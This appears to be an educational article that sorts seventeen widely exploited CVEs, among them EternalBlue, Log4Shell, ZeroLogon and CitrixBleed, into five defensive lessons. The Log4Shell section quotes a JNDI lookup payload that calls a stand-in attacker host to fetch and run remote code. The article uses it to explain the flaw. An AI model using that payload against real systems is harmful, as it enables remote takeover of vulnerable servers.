One Patch. Two Months. $10 Billion in Damages.
On May 12, 2017, a piece of ransomware called WannaCry began spreading across the internet. In the first 24 hours, it infected more than 200,000 computers in 150 countries. It shut down hospital emergency departments across the UK's National Health Service, forcing ambulance diversions. It halted car factories. It encrypted machines at telecoms, banks, universities, and government agencies worldwide. A security researcher accidentally stopped it by registering a $10 domain name that served as a kill switch — WannaCry checked whether that domain resolved before executing, and registering it flipped the off switch globally.
Six weeks later, a second, more destructive outbreak hit. NotPetya spread across Ukraine and then the world, destroying rather than encrypting. It cost shipping giant Maersk over $300 million, wiped out pharmaceutical manufacturer Merck's entire manufacturing capability for weeks, and caused an estimated $10 billion in total damages — the most destructive cyberattack in history at the time.
Both outbreaks used the same vulnerability: CVE-2017-0144, a buffer overflow in Windows SMBv1 — a file-sharing protocol from the 1980s that Microsoft had been trying to retire for years. Microsoft had patched it in March 2017. WannaCry struck in May. NotPetya in June. Every machine they destroyed was running an obsolete service its owner had never thought about, and had not applied a patch that had been available for months.
This is the story of modern cybersecurity vulnerabilities. Not once, but seventeen times.
Why These Seventeen
The vulnerabilities in this article all appear in CISA's Known Exploited Vulnerabilities catalog — the U.S. government's list of security flaws confirmed to have been exploited against real organizations. They span 2014 to 2024. They cover every major platform: Windows, Linux, Java, network appliances, and web applications. They have common names — Shellshock, Heartbleed, EternalBlue, Log4Shell, ZeroLogon, PrintNightmare, CitrixBleed, MOVEit — because they were significant enough that the security community gave them identities.
What unites them isn't the technical details. It's the pattern. Five patterns, specifically. Learn them and you will recognize the next generation of major vulnerabilities before the news gives them names.
Pattern One: The Service Nobody Thought About
The first pattern is the oldest: a service that was installed by default, never needed, never disabled, and never updated. It sits quietly on the network until someone figures out it's attackable — and then it's everywhere.
EternalBlue (CVE-2017-0144) targeted SMBv1 — a file-sharing protocol that Microsoft had deprecated in 2014 but left enabled by default on all Windows versions. Hundreds of millions of machines had port 445 open and responsive, speaking a protocol nobody was using for legitimate purposes, patched by almost no one. WannaCry didn't need to find a clever attack; it just needed a list of machines with port 445 open. The internet provided that list freely.
PrintNightmare (CVE-2021-34527) targeted the Windows Print Spooler — a service that runs as NT AUTHORITY\SYSTEM, the highest privilege level on Windows, and is enabled by default on all Windows machines including domain controllers. Domain controllers are the crown jewels of a Windows environment: compromise one and you own every user, every machine, every server in the organization. Almost no domain controllers have a legitimate need to run a print service. But the Print Spooler ran on them anyway, by default, until an accidental PoC publication in June 2021 turned it into a reliable domain takeover path for any authenticated user.
BlueKeep (CVE-2019-0708) targeted Remote Desktop Protocol — Windows' built-in remote access service — on Windows 7 and Server 2008. Millions of organizations had RDP exposed directly to the internet, either as a convenience for remote administration or as a forgotten port that had never been closed. The NSA, UK NCSC, and CISA issued coordinated warnings about its wormability. Five intelligence agencies warning about a single vulnerability is not a routine event.
Shellshock (CVE-2014-6271) targeted Bash — the default command shell on virtually every Linux and Unix system. The vulnerability was in how Bash parsed environment variables, a behavior so deeply embedded in the shell that it had been there for 25 years undetected. Web servers that ran CGI scripts passed user-supplied HTTP headers as environment variables to Bash. Mail servers did the same. DHCP clients did the same. Any service that touched Bash and accepted external input was potentially exploitable.
The lesson: every service you don't need is a service someone can attack. Disabling what you don't use is not optional cleanup — it's the first line of defense.
Pattern Two: The Dependency You Didn't Write
The second pattern is subtler and more modern: a vulnerability not in code you wrote, but in a library or framework embedded inside your application. You didn't install it intentionally. You installed something else, and it came along for the ride.
Log4Shell (CVE-2021-44228) is the most striking example. Apache Log4j2 is a Java logging library — a utility used to record application events for debugging and monitoring. When Log4j2 logged a string containing ${jndi:ldap://attacker.com/x}, it treated the string as an instruction, reached out to an attacker's server, and executed whatever code it retrieved. The vulnerability was in the logging infrastructure, which meant that any Java application that used Log4j2 for logging — and hundreds of millions did — was potentially vulnerable through any input it logged: a username, a search query, a User-Agent header.
Within 24 hours of disclosure in December 2021, security firms were observing millions of exploitation attempts. The affected software included Apple iCloud infrastructure, Amazon AWS services, Cisco products, VMware, Minecraft servers, and thousands of enterprise applications. Many organizations had no idea Log4j2 was even present in their environment, because it was a transitive dependency — a library pulled in by a library pulled in by an application, never explicitly installed, invisible to standard software inventories.
Heartbleed (CVE-2014-0160) worked the same way through OpenSSL — the cryptographic library underpinning HTTPS for most of the internet. A missing bounds check in the TLS heartbeat extension allowed any remote attacker to read 64 kilobytes of server memory per request, repeatedly, with no authentication and no server-side logs. At time of disclosure, approximately 17% of all HTTPS servers were vulnerable. Private keys, session tokens, and passwords were extractable — and nobody who had already exploited it left any traces.
Apache ActiveMQ (CVE-2023-46604) followed the same script in 2023. ActiveMQ is a message broker — infrastructure middleware that routes messages between application components. A deserialization flaw in its OpenWire protocol allowed a single crafted network packet to execute arbitrary code on the broker. Exploitation began within 24 hours of disclosure; HelloKitty ransomware was deploying payloads within days.
The lesson: your attack surface includes everything in your software supply chain. An accurate inventory of what's running — including transitive dependencies — is prerequisite to knowing what to patch.
Pattern Three: The Perimeter Device Trap
Security teams spend considerable effort protecting the servers and workstations inside the network. The devices they put in front of everything to provide that protection — firewalls, VPN concentrators, load balancers, application delivery controllers — receive less scrutiny and are updated less frequently. They are also, from an attacker's perspective, the ideal target: compromise the device that terminates all encrypted traffic and you see everything.
CitrixBleed (CVE-2023-4966) is the most instructive example. Citrix NetScaler Gateway is the VPN appliance that employees use to access internal resources remotely. A buffer over-read leaked active session tokens from the appliance's memory. An attacker with a leaked session token could impersonate a fully-authenticated VPN session — bypassing multi-factor authentication entirely, because MFA had already been satisfied for that session. LockBit ransomware used this to breach Boeing, disrupt DP World Australia's port operations nationally, compromise ICBC's New York trading desk, and hit dozens of other major organizations in late 2023.
Palo Alto Networks PAN-OS (CVE-2024-3400) received a perfect CVSS score of 10.0 in April 2024. A chain of two bugs in the GlobalProtect VPN feature — an arbitrary file creation flaw and a cron job that processed those files — allowed unauthenticated root command execution on the firewall itself. Chinese state-sponsored group UTA0218 deployed a custom Python backdoor named UPSTYLE and used compromised firewalls to harvest VPN credentials and pivot into victim networks. The CISA remediation deadline was 7 days — one of the shortest ever set.
F5 BIG-IP (CVE-2022-1388) and Citrix ADC (CVE-2019-19781) follow the same arc. F5 BIG-IP appliances sit in front of application servers handling load balancing and SSL termination; a single crafted HTTP request bypassed authentication to the management API and gave root on the appliance. Citrix ADC — the device thousands of organizations use as their internet-facing VPN gateway — spent six weeks in early 2020 with a publicly-known vulnerability and no patch, while approximately 80,000 internet-exposed instances were actively exploited by ransomware operators, cryptomining botnets, and nation-state groups simultaneously.
The lesson: the device you trust to protect your network is itself a high-value target. Perimeter devices need the same patching urgency as the servers they protect — often more, because they are directly internet-accessible and run as privileged infrastructure.
Pattern Four: Authentication Is Not What You Think
A common mental model of authentication: the attacker doesn't have a password, so they can't get in. Three of these vulnerabilities break that assumption in ways that have nothing to do with guessing or stealing passwords.
ZeroLogon (CVE-2020-1472) exploited a flaw in the cryptographic protocol Windows domain controllers use to authenticate other computers on the network. The authentication protocol used AES-CFB8 encryption with an all-zero initialization vector. Due to a statistical property of this cipher configuration, there is a 1-in-256 chance that encrypting all-zero bytes produces all-zero output. By sending about 256 authentication attempts composed entirely of zeros, an attacker could authenticate as any domain computer — including the domain controller itself — without knowing any password. The entire exploit takes seconds. Microsoft rated it CVSS 10.0. An attacker who lands on any machine with network access to a domain controller can take over the entire Active Directory domain in seconds, silently, without credentials.
ProxyLogon (CVE-2021-26855) bypassed Exchange Server's authentication through Server-Side Request Forgery — tricking the Exchange front-end proxy into forwarding requests to the back-end as if they came from the Exchange server itself. The back-end trusted internal requests implicitly. No password was needed; the SSRF manufactured the appearance of internal trust. Chinese state-sponsored group HAFNIUM was exploiting this as a zero-day before the patch existed, planting webshells in tens of thousands of Exchange servers that persisted even after patching.
CitrixBleed, covered above, broke authentication differently: not by bypassing the login process, but by stealing the proof-of-login after MFA had already been completed. The attacker never needed to defeat the authentication system — they waited until a legitimate user had already done it, then took the resulting token.
The lesson: authentication systems can be defeated without touching a password. Cryptographic flaws, trust relationships, session management, and protocol design are all attack surfaces. MFA stops credential stuffing; it does not stop session token theft or SSRF-based authentication bypass.
Pattern Five: The Clock Always Favors the Attacker
The final pattern is about time — specifically, the asymmetry between how fast attackers move and how fast defenders patch.
MOVEit (CVE-2023-34362) demonstrated this at scale. The Cl0p ransomware group exploited MOVEit Transfer's SQL injection vulnerability over the 2023 Memorial Day weekend — a holiday period specifically chosen to maximize the time before defenders noticed. By the time Progress Software was notified on May 31, Cl0p had already silently exfiltrated data from hundreds of organizations. The final tally: over 2,500 organizations breached, an estimated 66–100 million individuals' data exposed, including U.S. government agencies, universities, hospitals, and global corporations. Cl0p's approach was pure extortion — no ransomware encryption, just data theft and the threat of publication. The SQL injection vulnerability was straightforward; the sophistication was entirely operational.
Atlassian Confluence's OGNL injection (CVE-2022-26134) was being exploited as a zero-day before the patch existed. When Atlassian published the advisory, CISA set a 4-day remediation deadline — and exploitation was measured in hours from the moment of disclosure. The Citrix ADC vulnerability from 2019 sat unpatched for six weeks while 80,000 internet-exposed devices were systematically compromised.
EternalBlue had a patch available for two months before WannaCry. Every organization that patched in those two months was fine. Every organization that didn't lost data, systems, and in some cases lives — NHS emergency diversions during WannaCry had real patient safety consequences.
The lesson is uncomfortable: the gap between "patch available" and "mass exploitation" is measured in days, not months. Every day of delay is a day attackers have that defenders don't.
What This Means in Practice
Seventeen vulnerabilities, five patterns. They imply three things worth doing regardless of whether you're a system administrator, a developer, or someone who just wants to understand how attacks work.
Reduce attack surface. Every service you don't need is a service someone can attack. SMBv1 didn't need to be running. The Print Spooler didn't need to be on domain controllers. RDP didn't need to be internet-facing. Disabling unused services, protocols, and features is not a nice-to-have; it's the cheapest and most durable security control available.
Inventory your dependencies. Log4Shell spread so widely because most organizations didn't know they had it. A software bill of materials — a list of every library, framework, and component in your software stack — is the prerequisite for knowing what to patch. Without it, you can't respond to the next Log4Shell until a vendor tells you you're exposed.
Patch fast. The speed asymmetry is real and structural. Attackers reverse-engineer patches within hours of release to reconstruct the original vulnerability. The two-month WannaCry gap was unusual; MOVEit had no gap at all — Cl0p exploited before the patch existed. For critical, internet-facing systems, patch windows measured in weeks are no longer compatible with the threat environment. The organizations that patched EternalBlue in March 2017 had no problem in May. Those are the only two groups.
None of these lessons are new. Shellshock was discovered in 2014. The advice — reduce attack surface, know your dependencies, patch fast — has been consistent for a decade. The seventeen vulnerabilities in this article are evidence of what happens when that advice isn't followed, repeated across every platform, every industry, and every year.
The next named vulnerability is already being exploited somewhere. The question is whether it will be new advice or the same advice, applied too late again.
CVEs Covered
References
| Resource | Type |
|---|---|
| CISA Known Exploited Vulnerabilities Catalog | US Government |
| National Vulnerability Database | Vulnerability Database |